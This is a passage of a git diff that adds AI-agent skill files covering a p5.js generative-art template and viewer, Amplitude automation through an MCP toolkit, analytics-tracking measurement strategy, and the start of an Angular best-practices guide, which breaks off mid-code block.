+- Include seed presets (buttons for "Variation 1: Seed 42", "Variation 2: Seed 127", etc.)
+- Add a "Gallery Mode" that shows thumbnails of multiple seeds side-by-side
+- All within the same single artifact
+
+This is like creating a series of prints from the same plate - the algorithm is consistent, but each seed reveals different facets of its potential. The interactive nature means users discover their own favorites by exploring the seed space.
+
+---
+
+## THE CREATIVE PROCESS
+
+**User request** → **Algorithmic philosophy** → **Implementation**
+
+Each request is unique. The process involves:
+
+1. **Interpret the user's intent** - What aesthetic is being sought?
+2. **Create an algorithmic philosophy** (4-6 paragraphs) describing the computational approach
+3. **Implement it in code** - Build the algorithm that expresses this philosophy
+4. **Design appropriate parameters** - What should be tunable?
+5. **Build matching UI controls** - Sliders/inputs for those parameters
+
+**The constants**:
+- Anthropic branding (colors, fonts, layout)
+- Seed navigation (always present)
+- Self-contained HTML artifact
+
+**Everything else is variable**:
+- The algorithm itself
+- The parameters
+- The UI controls
+- The visual outcome
+
+To achieve the best results, trust creativity and let the philosophy guide the implementation.
+
+---
+
+## RESOURCES
+
+This skill includes helpful templates and documentation:
+
+- **templates/viewer.html**: REQUIRED STARTING POINT for all HTML artifacts.
+ - This is the foundation - contains the exact structure and Anthropic branding
+ - **Keep unchanged**: Layout structure, sidebar organization, Anthropic colors/fonts, seed controls, action buttons
+ - **Replace**: The p5.js algorithm, parameter definitions, and UI controls in Parameters section
+ - The extensive comments in the file mark exactly what to keep vs replace
+
+- **templates/generator_template.js**: Reference for p5.js best practices and code structure principles.
+ - Shows how to organize parameters, use seeded randomness, structure classes
+ - NOT a pattern menu - use these principles to build unique algorithms
+ - Embed algorithms inline in the HTML artifact (don't create separate .js files)
+
+**Critical reminder**:
+- The **template is the STARTING POINT**, not inspiration
+- The **algorithm is where to create** something unique
+- Don't copy the flow field example - build what the philosophy demands
+- But DO keep the exact UI structure and Anthropic branding from the template
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/templates/generator_template.js b/web-app/public/skills/algorithmic-art/templates/generator_template.js
new file mode 100644
index 00000000..e263fbde
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/templates/generator_template.js
@@ -0,0 +1,223 @@
+/**
+ * ═══════════════════════════════════════════════════════════════════════════
+ * P5.JS GENERATIVE ART - BEST PRACTICES
+ * ═══════════════════════════════════════════════════════════════════════════
+ *
+ * This file shows STRUCTURE and PRINCIPLES for p5.js generative art.
+ * It does NOT prescribe what art you should create.
+ *
+ * Your algorithmic philosophy should guide what you build.
+ * These are just best practices for how to structure your code.
+ *
+ * ═══════════════════════════════════════════════════════════════════════════
+ */
+
+// ============================================================================
+// 1. PARAMETER ORGANIZATION
+// ============================================================================
+// Keep all tunable parameters in one object
+// This makes it easy to:
+// - Connect to UI controls
+// - Reset to defaults
+// - Serialize/save configurations
+
+let params = {
+ // Define parameters that match YOUR algorithm
+ // Examples (customize for your art):
+ // - Counts: how many elements (particles, circles, branches, etc.)
+ // - Scales: size, speed, spacing
+ // - Probabilities: likelihood of events
+ // - Angles: rotation, direction
+ // - Colors: palette arrays
+
+ seed: 12345,
+ colorPalette: ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5'], // choose whatever colors you'd like
+ // Add YOUR parameters here based on your algorithm
+};
+
+// ============================================================================
+// 2. SEEDED RANDOMNESS (Critical for reproducibility)
+// ============================================================================
+// ALWAYS use seeded random for Art Blocks-style reproducible output
+
+function initializeSeed(seed) {
+ randomSeed(seed);
+ noiseSeed(seed);
+ // Now all random() and noise() calls will be deterministic
+}
+
+// ============================================================================
+// 3. P5.JS LIFECYCLE
+// ============================================================================
+
+function setup() {
+ createCanvas(800, 800);
+
+ // Initialize seed first
+ initializeSeed(params.seed);
+
+ // Set up your generative system
+ // This is where you initialize:
+ // - Arrays of objects
+ // - Grid structures
+ // - Initial positions
+ // - Starting states
+
+ // For static art: call noLoop() at the end of setup
+ // For animated art: let draw() keep running
+}
+
+function draw() {
+ // Option 1: Static generation (runs once, then stops)
+ // - Generate everything in setup()
+ // - Call noLoop() in setup()
+ // - draw() doesn't do much or can be empty
+
+ // Option 2: Animated generation (continuous)
+ // - Update your system each frame
+ // - Common patterns: particle movement, growth, evolution
+ // - Can optionally call noLoop() after N frames
+
+ // Option 3: User-triggered regeneration
+ // - Use noLoop() by default
+ // - Call redraw() when parameters change
+}
+
+// ============================================================================
+// 4. CLASS STRUCTURE (When you need objects)
+// ============================================================================
+// Use classes when your algorithm involves multiple entities
+// Examples: particles, agents, cells, nodes, etc.
+
+class Entity {
+ constructor() {
+ // Initialize entity properties
+ // Use random() here - it will be seeded
+ }
+
+ update() {
+ // Update entity state
+ // This might involve:
+ // - Physics calculations
+ // - Behavioral rules
+ // - Interactions with neighbors
+ }
+
+ display() {
+ // Render the entity
+ // Keep rendering logic separate from update logic
+ }
+}
+
+// ============================================================================
+// 5. PERFORMANCE CONSIDERATIONS
+// ============================================================================
+
+// For large numbers of elements:
+// - Pre-calculate what you can
+// - Use simple collision detection (spatial hashing if needed)
+// - Limit expensive operations (sqrt, trig) when possible
+// - Consider using p5 vectors efficiently
+
+// For smooth animation:
+// - Aim for 60fps
+// - Profile if things are slow
+// - Consider reducing particle counts or simplifying calculations
+
+// ============================================================================
+// 6. UTILITY FUNCTIONS
+// ============================================================================
+
+// Color utilities
+function hexToRgb(hex) {
+ const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
+ return result ? {
+ r: parseInt(result[1], 16),
+ g: parseInt(result[2], 16),
+ b: parseInt(result[3], 16)
+ } : null;
+}
+
+function colorFromPalette(index) {
+ return params.colorPalette[index % params.colorPalette.length];
+}
+
+// Mapping and easing
+function mapRange(value, inMin, inMax, outMin, outMax) {
+ return outMin + (outMax - outMin) * ((value - inMin) / (inMax - inMin));
+}
+
+function easeInOutCubic(t) {
+ return t < 0.5 ? 4 * t * t * t : 1 - Math.pow(-2 * t + 2, 3) / 2;
+}
+
+// Wrap a value to the opposite edge when it leaves [0, max]
+function wrapAround(value, max) {
+ if (value < 0) return max;
+ if (value > max) return 0;
+ return value;
+}
+
+// ============================================================================
+// 7. PARAMETER UPDATES (Connect to UI)
+// ============================================================================
+
+function updateParameter(paramName, value) {
+ params[paramName] = value;
+ // Decide if you need to regenerate or just update
+ // Some params can update in real-time, others need full regeneration
+}
+
+function regenerate() {
+ // Reinitialize your generative system
+ // Useful when parameters change significantly
+ initializeSeed(params.seed);
+ // Then regenerate your system
+}
+
+// ============================================================================
+// 8. COMMON P5.JS PATTERNS
+// ============================================================================
+
+// Drawing with transparency for trails/fading
+function fadeBackground(opacity) {
+ fill(250, 249, 245, opacity); // Anthropic light with alpha
+ noStroke();
+ rect(0, 0, width, height);
+}
+
+// Using noise for organic variation
+function getNoiseValue(x, y, scale = 0.01) {
+ return noise(x * scale, y * scale);
+}
+
+// Creating vectors from angles
+function vectorFromAngle(angle, magnitude = 1) {
+ return createVector(cos(angle), sin(angle)).mult(magnitude);
+}
+
+// ============================================================================
+// 9. EXPORT FUNCTIONS
+// ============================================================================
+
+function exportImage() {
+ saveCanvas('generative-art-' + params.seed, 'png');
+}
+
+// ============================================================================
+// REMEMBER
+// ============================================================================
+//
+// These are TOOLS and PRINCIPLES, not a recipe.
+// Your algorithmic philosophy should guide WHAT you create.
+// This structure helps you create it WELL.
+//
+// Focus on:
+// - Clean, readable code
+// - Parameterized for exploration
+// - Seeded for reproducibility
+// - Performant execution
+//
+// The art itself is entirely up to you!
+//
+// ============================================================================
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/templates/viewer.html b/web-app/public/skills/algorithmic-art/templates/viewer.html
new file mode 100644
index 00000000..630cc1f6
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/templates/viewer.html
@@ -0,0 +1,599 @@
+<!-- [markup lost in extraction] The 599-line viewer page's HTML tags were
+stripped during extraction; only text content survived. Recoverable content:
+page title "Generative Art Viewer"; editable title and subheader placeholders;
+a Seed control; a Parameters panel with sliders (default values 5000, 0.5,
+0.005, 8); a Colors panel with pickers (#d97757, #6a9bcc, #788c5d); an
+Actions panel; and the loading message "Initializing generative art...". -->
\ No newline at end of file
diff --git a/web-app/public/skills/amplitude-automation/SKILL.md b/web-app/public/skills/amplitude-automation/SKILL.md
new file mode 100644
index 00000000..c9b23c0f
--- /dev/null
+++ b/web-app/public/skills/amplitude-automation/SKILL.md
@@ -0,0 +1,216 @@
+---
+name: amplitude-automation
+description: "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas."
+requires:
+ mcp: [rube]
+---
+
+# Amplitude Automation via Rube MCP
+
+Automate Amplitude product analytics through Composio's Amplitude toolkit via Rube MCP.
+
+## Prerequisites
+
+- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
+- Active Amplitude connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
+- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
+
+## Setup
+
+**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
+
+1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
+2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `amplitude`
+3. If connection is not ACTIVE, follow the returned auth link to complete Amplitude authentication
+4. Confirm connection status shows ACTIVE before running any workflows
+
+## Core Workflows
+
+### 1. Send Events
+
+**When to use**: User wants to track events or send event data to Amplitude
+
+**Tool sequence**:
+1. `AMPLITUDE_SEND_EVENTS` - Send one or more events to Amplitude [Required]
+
+**Key parameters**:
+- `events`: Array of event objects, each containing:
+ - `event_type`: Name of the event (e.g., 'page_view', 'purchase')
+ - `user_id`: Unique user identifier (required if no `device_id`)
+ - `device_id`: Device identifier (required if no `user_id`)
+ - `event_properties`: Object with custom event properties
+ - `user_properties`: Object with user properties to set
+ - `time`: Event timestamp in milliseconds since epoch
+
+**Pitfalls**:
+- At least one of `user_id` or `device_id` is required per event
+- `event_type` is required for every event; cannot be empty
+- `time` must be in milliseconds (13-digit epoch), not seconds
+- Batch limit applies; check schema for maximum events per request
+- Events are processed asynchronously; successful API response does not mean data is immediately queryable
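A minimal payload sketch following the parameter list above (event name, IDs, and property values are illustrative):

```javascript
// Illustrative AMPLITUDE_SEND_EVENTS payload: one purchase event.
// Note the required event_type, the user_id (or device_id), and the
// 13-digit millisecond timestamp.
const payload = {
  events: [
    {
      event_type: 'purchase',
      user_id: 'user-123',              // or device_id
      time: Date.now(),                 // milliseconds since epoch
      event_properties: { sku: 'SKU-1', price: 9.99 },
      user_properties: { plan: 'premium' },
    },
  ],
};
```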
+
+### 2. Get User Activity
+
+**When to use**: User wants to view event history for a specific user
+
+**Tool sequence**:
+1. `AMPLITUDE_FIND_USER` - Find user by ID or property [Prerequisite]
+2. `AMPLITUDE_GET_USER_ACTIVITY` - Retrieve user's event stream [Required]
+
+**Key parameters**:
+- `user`: Amplitude internal user ID (from FIND_USER)
+- `offset`: Pagination offset for event list
+- `limit`: Maximum number of events to return
+
+**Pitfalls**:
+- `user` parameter requires Amplitude's internal user ID, NOT your application's user_id
+- Must call FIND_USER first to resolve your user_id to Amplitude's internal ID
+- Activity is returned in reverse chronological order by default
+- Large activity histories require pagination via `offset`
+
+### 3. Find and Identify Users
+
+**When to use**: User wants to look up users or set user properties
+
+**Tool sequence**:
+1. `AMPLITUDE_FIND_USER` - Search for a user by various identifiers [Required]
+2. `AMPLITUDE_IDENTIFY` - Set or update user properties [Optional]
+
+**Key parameters**:
+- For FIND_USER:
+ - `user`: Search term (user_id, email, or Amplitude ID)
+- For IDENTIFY:
+ - `user_id`: Your application's user identifier
+ - `device_id`: Device identifier (alternative to user_id)
+ - `user_properties`: Object with `$set`, `$unset`, `$add`, `$append` operations
+
+**Pitfalls**:
+- FIND_USER searches across user_id, device_id, and Amplitude ID
+- IDENTIFY uses special property operations (`$set`, `$unset`, `$add`, `$append`)
+- `$set` overwrites existing values; `$setOnce` only sets if not already set
+- At least one of `user_id` or `device_id` is required for IDENTIFY
+- User property changes are eventually consistent, not immediate
+
+### 4. Manage Cohorts
+
+**When to use**: User wants to list cohorts, view cohort details, or update cohort membership
+
+**Tool sequence**:
+1. `AMPLITUDE_LIST_COHORTS` - List all saved cohorts [Required]
+2. `AMPLITUDE_GET_COHORT` - Get detailed cohort information [Optional]
+3. `AMPLITUDE_UPDATE_COHORT_MEMBERSHIP` - Add/remove users from a cohort [Optional]
+4. `AMPLITUDE_CHECK_COHORT_STATUS` - Check async cohort operation status [Optional]
+
+**Key parameters**:
+- For LIST_COHORTS: No required parameters
+- For GET_COHORT: `cohort_id` (from list results)
+- For UPDATE_COHORT_MEMBERSHIP:
+ - `cohort_id`: Target cohort ID
+ - `memberships`: Object with `add` and/or `remove` arrays of user IDs
+- For CHECK_COHORT_STATUS: `request_id` from update response
+
+**Pitfalls**:
+- Cohort IDs are required for all cohort-specific operations
+- UPDATE_COHORT_MEMBERSHIP is asynchronous; use CHECK_COHORT_STATUS to verify
+- `request_id` from the update response is needed for status checking
+- Maximum membership changes per request may be limited; chunk large updates
+- Only behavioral cohorts support API membership updates
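Chunking large membership updates, as the pitfalls above suggest, can be sketched like this (the default per-request limit is an assumption — check the current schema):

```javascript
// Split a large list of user IDs into fixed-size chunks so each
// UPDATE_COHORT_MEMBERSHIP call stays under the per-request limit.
function chunkIds(ids, maxPerRequest = 100) {
  const chunks = [];
  for (let i = 0; i < ids.length; i += maxPerRequest) {
    chunks.push(ids.slice(i, i + maxPerRequest));
  }
  return chunks;
}
```

Issue one update per chunk and collect each `request_id` for status checking.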
+
+### 5. Browse Event Categories
+
+**When to use**: User wants to discover available event types and categories in Amplitude
+
+**Tool sequence**:
+1. `AMPLITUDE_GET_EVENT_CATEGORIES` - List all event categories [Required]
+
+**Key parameters**:
+- No required parameters; returns all configured event categories
+
+**Pitfalls**:
+- Categories are configured in Amplitude UI; API provides read access
+- Event names within categories are case-sensitive
+- Use these categories to validate event_type values before sending events
+
+## Common Patterns
+
+### ID Resolution
+
+**Application user_id -> Amplitude internal ID**:
+```
+1. Call AMPLITUDE_FIND_USER with user=your_user_id
+2. Extract Amplitude's internal user ID from response
+3. Use internal ID for GET_USER_ACTIVITY
+```
+
+**Cohort name -> Cohort ID**:
+```
+1. Call AMPLITUDE_LIST_COHORTS
+2. Find cohort by name in results
+3. Extract id for cohort operations
+```
+
+### User Property Operations
+
+Amplitude IDENTIFY supports these property operations:
+- `$set`: Set property value (overwrites existing)
+- `$setOnce`: Set only if property not already set
+- `$add`: Increment numeric property
+- `$append`: Append to list property
+- `$unset`: Remove property entirely
+
+Example structure:
+```json
+{
+ "user_properties": {
+ "$set": {"plan": "premium", "company": "Acme"},
+ "$add": {"login_count": 1}
+ }
+}
+```
+
+### Async Operation Pattern
+
+For cohort membership updates:
+```
+1. Call AMPLITUDE_UPDATE_COHORT_MEMBERSHIP -> get request_id
+2. Call AMPLITUDE_CHECK_COHORT_STATUS with request_id
+3. Repeat step 2 until status is 'complete' or 'error'
+```
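The polling loop above, as a sketch — `checkStatus` stands in for the CHECK_COHORT_STATUS call, and the `'complete'`/`'error'` status strings mirror the step list (adjust to the actual tool response):

```javascript
// Poll an async cohort update until it completes, errors, or times out.
async function waitForCohortUpdate(requestId, checkStatus,
    { intervalMs = 2000, maxAttempts = 30 } = {}) {
  for (let attempt = 0; attempt < maxAttempts; attempt++) {
    const status = await checkStatus(requestId);
    if (status === 'complete') return true;
    if (status === 'error') throw new Error(`Cohort update ${requestId} failed`);
    // Still pending: wait before the next check
    await new Promise((resolve) => setTimeout(resolve, intervalMs));
  }
  throw new Error(`Cohort update ${requestId} timed out`);
}
```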
+
+## Known Pitfalls
+
+**User IDs**:
+- Amplitude has its own internal user IDs separate from your application's
+- FIND_USER resolves your IDs to Amplitude's internal IDs
+- GET_USER_ACTIVITY requires Amplitude's internal ID, not your user_id
+
+**Event Timestamps**:
+- Must be in milliseconds since epoch (13 digits)
+- Seconds (10 digits) will be interpreted as very old dates
+- Omitting timestamp uses server receive time
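A defensive helper for the milliseconds pitfall above — a heuristic sketch that assumes timestamps after roughly 2001, so ten-digit values are treated as seconds:

```javascript
// Normalize an epoch timestamp to milliseconds. Values below ~1e12
// (September 2001 in ms) are almost certainly seconds, so scale them.
function toEpochMillis(timestamp) {
  if (!Number.isFinite(timestamp) || timestamp <= 0) {
    throw new Error(`Invalid timestamp: ${timestamp}`);
  }
  return timestamp < 1e12 ? Math.round(timestamp * 1000) : Math.round(timestamp);
}
```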
+
+**Rate Limits**:
+- Event ingestion has throughput limits per project
+- Batch events where possible to reduce API calls
+- Cohort membership updates have async processing limits
+
+**Response Parsing**:
+- Response data may be nested under `data` key
+- User activity returns events in reverse chronological order
+- Cohort lists may include archived cohorts; check status field
+- Parse defensively with fallbacks for optional fields
+
+## Quick Reference
+
+| Task | Tool Slug | Key Params |
+|------|-----------|------------|
+| Send events | AMPLITUDE_SEND_EVENTS | events (array) |
+| Find user | AMPLITUDE_FIND_USER | user |
+| Get user activity | AMPLITUDE_GET_USER_ACTIVITY | user, offset, limit |
+| Identify user | AMPLITUDE_IDENTIFY | user_id, user_properties |
+| List cohorts | AMPLITUDE_LIST_COHORTS | (none) |
+| Get cohort | AMPLITUDE_GET_COHORT | cohort_id |
+| Update cohort members | AMPLITUDE_UPDATE_COHORT_MEMBERSHIP | cohort_id, memberships |
+| Check cohort status | AMPLITUDE_CHECK_COHORT_STATUS | request_id |
+| List event categories | AMPLITUDE_GET_EVENT_CATEGORIES | (none) |
diff --git a/web-app/public/skills/analytics-tracking/SKILL.md b/web-app/public/skills/analytics-tracking/SKILL.md
new file mode 100644
index 00000000..475e43d8
--- /dev/null
+++ b/web-app/public/skills/analytics-tracking/SKILL.md
@@ -0,0 +1,404 @@
+---
+name: analytics-tracking
+description: >
+ Design, audit, and improve analytics tracking systems that produce reliable,
+ decision-ready data. Use when the user wants to set up, fix, or evaluate
+ analytics tracking (GA4, GTM, product analytics, events, conversions, UTMs).
+ This skill focuses on measurement strategy, signal quality, and validation—
+ not just firing events.
+---
+
+# Analytics Tracking & Measurement Strategy
+
+You are an expert in **analytics implementation and measurement design**.
+Your goal is to ensure tracking produces **trustworthy signals that directly support decisions** across marketing, product, and growth.
+
+You do **not** track everything.
+You do **not** optimize dashboards without fixing instrumentation.
+You do **not** treat GA4 numbers as truth unless validated.
+
+---
+
+## Phase 0: Measurement Readiness & Signal Quality Index (Required)
+
+Before adding or changing tracking, calculate the **Measurement Readiness & Signal Quality Index**.
+
+### Purpose
+
+This index answers:
+
+> **Can this analytics setup produce reliable, decision-grade insights?**
+
+It prevents:
+
+* event sprawl
+* vanity tracking
+* misleading conversion data
+* false confidence in broken analytics
+
+---
+
+## 🔢 Measurement Readiness & Signal Quality Index
+
+### Total Score: **0–100**
+
+This is a **diagnostic score**, not a performance KPI.
+
+---
+
+### Scoring Categories & Weights
+
+| Category | Weight |
+| ----------------------------- | ------- |
+| Decision Alignment | 25 |
+| Event Model Clarity | 20 |
+| Data Accuracy & Integrity | 20 |
+| Conversion Definition Quality | 15 |
+| Attribution & Context | 10 |
+| Governance & Maintenance | 10 |
+| **Total** | **100** |
+
+---
+
+### Category Definitions
+
+#### 1. Decision Alignment (0–25)
+
+* Clear business questions defined
+* Each tracked event maps to a decision
+* No events tracked “just in case”
+
+---
+
+#### 2. Event Model Clarity (0–20)
+
+* Events represent **meaningful actions**
+* Naming conventions are consistent
+* Properties carry context, not noise
+
+---
+
+#### 3. Data Accuracy & Integrity (0–20)
+
+* Events fire reliably
+* No duplication or inflation
+* Values are correct and complete
+* Cross-browser and mobile validated
+
+---
+
+#### 4. Conversion Definition Quality (0–15)
+
+* Conversions represent real success
+* Conversion counting is intentional
+* Funnel stages are distinguishable
+
+---
+
+#### 5. Attribution & Context (0–10)
+
+* UTMs are consistent and complete
+* Traffic source context is preserved
+* Cross-domain / cross-device handled appropriately
+
+---
+
+#### 6. Governance & Maintenance (0–10)
+
+* Tracking is documented
+* Ownership is clear
+* Changes are versioned and monitored
+
+---
+
+### Readiness Bands (Required)
+
+| Score | Verdict | Interpretation |
+| ------ | --------------------- | --------------------------------- |
+| 85–100 | **Measurement-Ready** | Safe to optimize and experiment |
+| 70–84 | **Usable with Gaps** | Fix issues before major decisions |
+| 55–69 | **Unreliable** | Data cannot be trusted yet |
+| <55 | **Broken** | Do not act on this data |
+
+If verdict is **Broken**, stop and recommend remediation first.
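The bands translate directly into a lookup, sketched here:

```javascript
// Map a Measurement Readiness score (0-100) to its verdict band.
function readinessVerdict(score) {
  if (score < 0 || score > 100) throw new RangeError(`Score out of range: ${score}`);
  if (score >= 85) return 'Measurement-Ready';
  if (score >= 70) return 'Usable with Gaps';
  if (score >= 55) return 'Unreliable';
  return 'Broken';
}
```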
+
+---
+
+## Phase 1: Context & Decision Definition
+
+(Proceed only after scoring)
+
+### 1. Business Context
+
+* What decisions will this data inform?
+* Who uses the data (marketing, product, leadership)?
+* What actions will be taken based on insights?
+
+---
+
+### 2. Current State
+
+* Tools in use (GA4, GTM, Mixpanel, Amplitude, etc.)
+* Existing events and conversions
+* Known issues or distrust in data
+
+---
+
+### 3. Technical & Compliance Context
+
+* Tech stack and rendering model
+* Who implements and maintains tracking
+* Privacy, consent, and regulatory constraints
+
+---
+
+## Core Principles (Non-Negotiable)
+
+### 1. Track for Decisions, Not Curiosity
+
+If no decision depends on it, **don’t track it**.
+
+---
+
+### 2. Start with Questions, Work Backwards
+
+Define:
+
+* What you need to know
+* What action you’ll take
+* What signal proves it
+
+Then design events.
+
+---
+
+### 3. Events Represent Meaningful State Changes
+
+Avoid:
+
+* cosmetic clicks
+* redundant events
+* UI noise
+
+Prefer:
+
+* intent
+* completion
+* commitment
+
+---
+
+### 4. Data Quality Beats Volume
+
+Fewer accurate events > many unreliable ones.
+
+---
+
+## Event Model Design
+
+### Event Taxonomy
+
+**Navigation / Exposure**
+
+* page_view (enhanced)
+* content_viewed
+* pricing_viewed
+
+**Intent Signals**
+
+* cta_clicked
+* form_started
+* demo_requested
+
+**Completion Signals**
+
+* signup_completed
+* purchase_completed
+* subscription_changed
+
+**System / State Changes**
+
+* onboarding_completed
+* feature_activated
+* error_occurred
+
+---
+
+### Event Naming Conventions
+
+**Recommended pattern:**
+
+```
+object_action[_context]
+```
+
+Examples:
+
+* signup_completed
+* pricing_viewed
+* cta_hero_clicked
+* onboarding_step_completed
+
+Rules:
+
+* lowercase
+* underscores
+* no spaces
+* no ambiguity
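The naming rules above can be enforced mechanically — a sketch that accepts `object_action[_context]` names and rejects everything else:

```javascript
// Validate the object_action[_context] convention: lowercase segments
// separated by single underscores, no spaces, at least two segments.
function isValidEventName(name) {
  return /^[a-z]+(_[a-z0-9]+)+$/.test(name);
}
```

Running this check in code review or CI keeps the event model consistent as it grows.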
+
+---
+
+### Event Properties (Context, Not Noise)
+
+Include:
+
+* where (page, section)
+* who (user_type, plan)
+* how (method, variant)
+
+Avoid:
+
+* PII
+* free-text fields
+* duplicated auto-properties
+
+---
+
+## Conversion Strategy
+
+### What Qualifies as a Conversion
+
+A conversion must represent:
+
+* real value
+* completed intent
+* irreversible progress
+
+Examples:
+
+* signup_completed
+* purchase_completed
+* demo_booked
+
+Not conversions:
+
+* page views
+* button clicks
+* form starts
+
+---
+
+### Conversion Counting Rules
+
+* Once per session vs every occurrence
+* Explicitly documented
+* Consistent across tools
+
+---
+
+## GA4 & GTM (Implementation Guidance)
+
+*(Tool-specific, but optional)*
+
+* Prefer GA4 recommended events
+* Use GTM for orchestration, not logic
+* Push clean dataLayer events
+* Avoid multiple containers
+* Version every publish
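A clean dataLayer push, as recommended above — event name and context fields are illustrative, and `globalThis` stands in for `window` so the sketch runs anywhere:

```javascript
// Push a flat, well-named event to GTM's dataLayer. GTM reads the
// `event` key as the trigger; everything else is context.
globalThis.dataLayer = globalThis.dataLayer || [];

function trackEvent(eventName, context = {}) {
  globalThis.dataLayer.push({ event: eventName, ...context });
}

trackEvent('signup_completed', { method: 'email', plan: 'free' });
```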
+
+---
+
+## UTM & Attribution Discipline
+
+### UTM Rules
+
+* lowercase only
+* consistent separators
+* documented centrally
+* never overwritten client-side
+
+UTMs exist to **explain performance**, not inflate numbers.
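A normalization sketch for the rules above, covering the five standard UTM parameters (treat the set as illustrative if your taxonomy differs):

```javascript
// Lowercase and trim the standard UTM parameters on an outbound URL
// so source/medium values stay consistent across campaigns.
function normalizeUtms(url) {
  const u = new URL(url);
  const utmKeys = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content'];
  for (const key of utmKeys) {
    const value = u.searchParams.get(key);
    if (value !== null) u.searchParams.set(key, value.trim().toLowerCase());
  }
  return u.toString();
}
```

Non-UTM query parameters pass through untouched.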
+
+---
+
+## Validation & Debugging
+
+### Required Validation
+
+* Real-time verification
+* Duplicate detection
+* Cross-browser testing
+* Mobile testing
+* Consent-state testing
+
+### Common Failure Modes
+
+* double firing
+* missing properties
+* broken attribution
+* PII leakage
+* inflated conversions
+
+---
+
+## Privacy & Compliance
+
+* Consent before tracking where required
+* Data minimization
+* User deletion support
+* Retention policies reviewed
+
+Analytics that violate trust undermine optimization.
+
+---
+
+## Output Format (Required)
+
+### Measurement Strategy Summary
+
+* Measurement Readiness Index score + verdict
+* Key risks and gaps
+* Recommended remediation order
+
+---
+
+### Tracking Plan
+
+| Event | Description | Properties | Trigger | Decision Supported |
+| ----- | ----------- | ---------- | ------- | ------------------ |
+
+---
+
+### Conversions
+
+| Conversion | Event | Counting | Used By |
+| ---------- | ----- | -------- | ------- |
+
+---
+
+### Implementation Notes
+
+* Tool-specific setup
+* Ownership
+* Validation steps
+
+---
+
+## Questions to Ask (If Needed)
+
+1. What decisions depend on this data?
+2. Which metrics are currently trusted or distrusted?
+3. Who owns analytics long term?
+4. What compliance constraints apply?
+5. What tools are already in place?
+
+---
+
+## Related Skills
+
+* **page-cro** – Uses this data for optimization
+* **ab-test-setup** – Requires clean conversions
+* **seo-audit** – Organic performance analysis
+* **programmatic-seo** – Scale requires reliable signals
+
+---
diff --git a/web-app/public/skills/angular-best-practices/README.md b/web-app/public/skills/angular-best-practices/README.md
new file mode 100644
index 00000000..143a521f
--- /dev/null
+++ b/web-app/public/skills/angular-best-practices/README.md
@@ -0,0 +1,58 @@
+# Angular Best Practices
+
+Performance optimization and best practices for Angular applications optimized for AI agents and LLMs.
+
+## Overview
+
+This skill provides prioritized performance guidelines across:
+
+- **Change Detection** - OnPush strategy, Signals, Zoneless apps
+- **Async Operations** - Avoiding waterfalls, SSR preloading
+- **Bundle Optimization** - Lazy loading, `@defer`, tree-shaking
+- **Rendering Performance** - TrackBy, virtual scrolling, CDK
+- **SSR & Hydration** - Server-side rendering patterns
+- **Template Optimization** - Structural directives, pipe memoization
+- **State Management** - Efficient reactivity patterns
+- **Memory Management** - Subscription cleanup, detached refs
+
+## Structure
+
+The `SKILL.md` file is organized by priority:
+
+1. **Critical Priority** - Largest performance gains (change detection, async)
+2. **High Priority** - Significant impact (bundles, rendering)
+3. **Medium Priority** - Noticeable improvements (SSR, templates)
+4. **Low Priority** - Incremental gains (memory, cleanup)
+
+Each rule includes:
+
+- ❌ **WRONG** - What not to do
+- ✅ **CORRECT** - Recommended pattern
+- 📝 **Why** - Explanation of the impact
+
+## Quick Reference Checklist
+
+**For New Components:**
+
+- [ ] Using `ChangeDetectionStrategy.OnPush`
+- [ ] Using Signals for reactive state
+- [ ] Using `@defer` for non-critical content
+- [ ] Using `trackBy` for `*ngFor` loops
+- [ ] No subscriptions without cleanup
+
+**For Performance Reviews:**
+
+- [ ] No async waterfalls (parallel data fetching)
+- [ ] Routes lazy-loaded
+- [ ] Large libraries code-split
+- [ ] Images use `NgOptimizedImage`
+
+## Version
+
+Current version: 1.0.0 (February 2026)
+
+## References
+
+- [Angular Performance](https://angular.dev/guide/performance)
+- [Zoneless Angular](https://angular.dev/guide/zoneless)
+- [Angular SSR](https://angular.dev/guide/ssr)
diff --git a/web-app/public/skills/angular-best-practices/SKILL.md b/web-app/public/skills/angular-best-practices/SKILL.md
new file mode 100644
index 00000000..c2920a58
--- /dev/null
+++ b/web-app/public/skills/angular-best-practices/SKILL.md
@@ -0,0 +1,559 @@
+---
+name: angular-best-practices
+description: Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency.
+risk: safe
+source: self
+---
+
+# Angular Best Practices
+
+Comprehensive performance optimization guide for Angular applications. Contains prioritized rules for eliminating performance bottlenecks, optimizing bundles, and improving rendering.
+
+## When to Apply
+
+Reference these guidelines when:
+
+- Writing new Angular components or pages
+- Implementing data fetching patterns
+- Reviewing code for performance issues
+- Refactoring existing Angular code
+- Optimizing bundle size or load times
+- Configuring SSR/hydration
+
+---
+
+## Rule Categories by Priority
+
+| Priority | Category | Impact | Focus |
+| -------- | --------------------- | ---------- | ------------------------------- |
+| 1 | Change Detection | CRITICAL | Signals, OnPush, Zoneless |
+| 2 | Async Waterfalls | CRITICAL | RxJS patterns, SSR preloading |
+| 3 | Bundle Optimization | CRITICAL | Lazy loading, tree shaking |
+| 4 | Rendering Performance | HIGH | @defer, trackBy, virtualization |
+| 5 | Server-Side Rendering | HIGH | Hydration, prerendering |
+| 6 | Template Optimization | MEDIUM | Control flow, pipes |
+| 7 | State Management | MEDIUM | Signal patterns, selectors |
+| 8 | Memory Management | LOW-MEDIUM | Cleanup, subscriptions |
+
+---
+
+## 1. Change Detection (CRITICAL)
+
+### Use OnPush Change Detection
+
+```typescript
+// CORRECT - OnPush with Signals
+@Component({
+ changeDetection: ChangeDetectionStrategy.OnPush,
+ template: `